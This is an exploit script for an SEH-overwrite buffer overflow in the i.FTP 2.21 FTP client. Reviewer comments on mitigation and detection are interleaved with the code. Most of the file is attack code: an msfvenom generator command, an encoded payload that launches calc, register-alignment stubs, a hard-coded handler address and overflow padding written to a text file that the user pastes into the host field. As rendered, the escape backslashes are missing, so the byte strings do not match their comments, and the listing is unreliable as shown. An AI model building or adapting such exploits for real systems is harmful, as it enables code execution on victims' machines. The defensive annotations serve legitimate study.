i.FTP 2.21 Host Address / URL Field SEH Exploit
#!/usr/bin/python
# Exploit Title: i.FTP 2.21 Host Address / URL Field SEH Exploit
# Date: 3-5-2016
# Exploit Author: Tantaryu MING
# Vendor Homepage: http://www.memecode.com/iftp.php
# Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Version: 2.21
# Tested on: Windows 7 SP1 x86_64
# How to exploit: Connect -> Host Address / URL -> copy + paste content of evil.txt -> Press 'Connect' button

# NOTE(review): Summary. This script is a proof-of-concept that only writes a
# text file. Per the header, the file's contents are pasted into the
# "Host Address / URL" field of i.FTP 2.21. The title and the record/handler
# comments further down indicate an over-long value in that field overwriting
# a structured-exception-handler (SEH) record on the stack.
# The header calls the file evil.txt, but the script writes exploit.txt.
#
# NOTE(review): As rendered on this page the \x escapes carry no backslash, so
# every string below is literal text ("x41" is three characters, not one
# byte). The byte meanings in the inline comments describe the author's
# intent, not what this listing produces as shown.
#
# NOTE(review): Mitigation. The page names no fixed release, so check the
# vendor for a build newer than 2.21. The underlying fix is a length check on
# the host field before it is copied. Independently of a patch, SEH-overwrite
# techniques depend on a handler address that is known in advance, which
# ASLR (/DYNAMICBASE), SafeSEH (/SAFESEH) and SEHOP are designed to take
# away; DEP (/NXCOMPAT) addresses execution of data placed on the stack.
#
# NOTE(review): Detection. The generator line below requests a payload that
# only starts calc, so the observable effect on a test host would be a
# calculator process whose parent is the i.FTP process. An FTP client spawning
# unrelated child processes, or a host field well over a thousand characters
# long, is a reasonable thing to alert on.

# Bare string literal recording the msfvenom command line the author used to
# generate the payload: windows/exec with CMD=calc, encoded with
# x86/alpha_upper. The -b list excludes 0x00, 0x0d, 0x20 and every byte from
# 0x80 to 0xff, i.e. the payload was restricted to 7-bit characters.
''' msfvenom -p windows/exec CMD=calc -e x86/alpha_upper -a x86 -f c -b 'x00x0dx20x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff' BufferREgister=EAX '''

# Encoded payload emitted by the command above, kept as adjacent string
# literals that Python concatenates into one value.
shellcode = (
"x50x59x49x49x49x49x49x49x49x49x49x49x51x5ax56"
"x54x58x33x30x56x58x34x41x50x30x41x33x48x48x30"
"x41x30x30x41x42x41x41x42x54x41x41x51x32x41x42"
"x32x42x42x30x42x42x58x50x38x41x43x4ax4ax49x4b"
"x4cx5ax48x4bx32x35x50x33x30x43x30x33x50x4dx59"
"x4ax45x36x51x39x50x42x44x4cx4bx30x50x56x50x4c"
"x4bx51x42x34x4cx4cx4bx30x52x35x44x4cx4bx42x52"
"x31x38x44x4fx58x37x51x5ax57x56x30x31x4bx4fx4e"
"x4cx47x4cx35x31x43x4cx53x32x56x4cx51x30x59x51"
"x58x4fx34x4dx53x31x49x57x4bx52x4ax52x50x52x50"
"x57x4cx4bx31x42x44x50x4cx4bx50x4ax37x4cx4cx4b"
"x30x4cx54x51x52x58x4bx53x50x48x35x51x38x51x50"
"x51x4cx4bx31x49x47x50x33x31x48x53x4cx4bx51x59"
"x32x38x4dx33x47x4ax47x39x4cx4bx47x44x4cx4bx35"
"x51x59x46x56x51x4bx4fx4ex4cx59x51x48x4fx54x4d"
"x45x51x58x47x57x48x4dx30x33x45x4ax56x55x53x53"
"x4dx4cx38x57x4bx33x4dx47x54x52x55x4bx54x30x58"
"x4cx4bx31x48x36x44x43x31x59x43x43x56x4cx4bx44"
"x4cx50x4bx4cx4bx46x38x35x4cx45x51x4ex33x4cx4b"
"x34x44x4cx4bx45x51x58x50x4bx39x51x54x36x44x57"
"x54x51x4bx31x4bx33x51x36x39x51x4ax30x51x4bx4f"
"x4bx50x51x4fx31x4fx30x5ax4cx4bx45x42x4ax4bx4c"
"x4dx51x4dx33x5ax55x51x4cx4dx4dx55x58x32x35x50"
"x45x50x45x50x56x30x33x58x30x31x4cx4bx42x4fx4d"
"x57x4bx4fx38x55x4fx4bx4ax50x4ex55x39x32x50x56"
"x52x48x59x36x4cx55x4fx4dx4dx4dx4bx4fx49x45x37"
"x4cx35x56x33x4cx44x4ax4dx50x4bx4bx4bx50x42x55"
"x33x35x4fx4bx37x37x55x43x53x42x52x4fx53x5ax33"
"x30x46x33x4bx4fx39x45x53x53x45x31x52x4cx35x33"
"x35x50x41x41"
)

# Two AND EAX, imm32 instructions (opcode 0x25) whose masks share no set bits
# (0x2E2E2E2E & 0x11111111 == 0), which is how the name's "zeroed" is reached.
eax_zeroed = 'x25x2Ex2Ex2Ex2E'
eax_zeroed += 'x25x11x11x11x11'

# Register adjustment that precedes the payload; the generator line above sets
# BufferREgister=EAX, so the encoded payload presumably expects EAX to hold
# its own address. Verify against the encoder's documentation.
align_to_eax = "x54x58" # Get ESP and pop it into EAX
align_to_eax += "x2dx7dx7dx7dx7d" # SUB EAX, 0x7d7d7d7d
align_to_eax += "x2dx01x01x01x01" # SUB EAX, 0x01010101
align_to_eax += "x2dx01x01x02x02" # SUB EAX, 0x02020101
align_to_eax += "x2dx7cx73x7fx7f" # SUB EAX, 0x7f7f737c

# Layout of the value written to the file, in order: 1865 filler characters,
# the two 4-byte SEH record fields, the register setup, 5 more filler
# characters, the payload, and 4 trailing characters.
buffer = "x41" * 1865
buffer += "x42x42x71x04" # Pointer to Next SEH Record
# NOTE(review): the handler value is a hard-coded address; it presumably lies
# in a module that loads at a fixed base on the tested system. Confirm which
# module, since that is the one to rebuild with ASLR/SafeSEH.
buffer += "x78x2ax01x10" # SEH HANDLER
buffer += eax_zeroed
buffer += align_to_eax
buffer += "x43" * 5
buffer += shellcode
buffer += "E" * 4

# Write the assembled value to exploit.txt in binary mode; nothing is sent
# over the network by this script.
f = open('exploit.txt', "wb")
f.write(buffer)
f.close()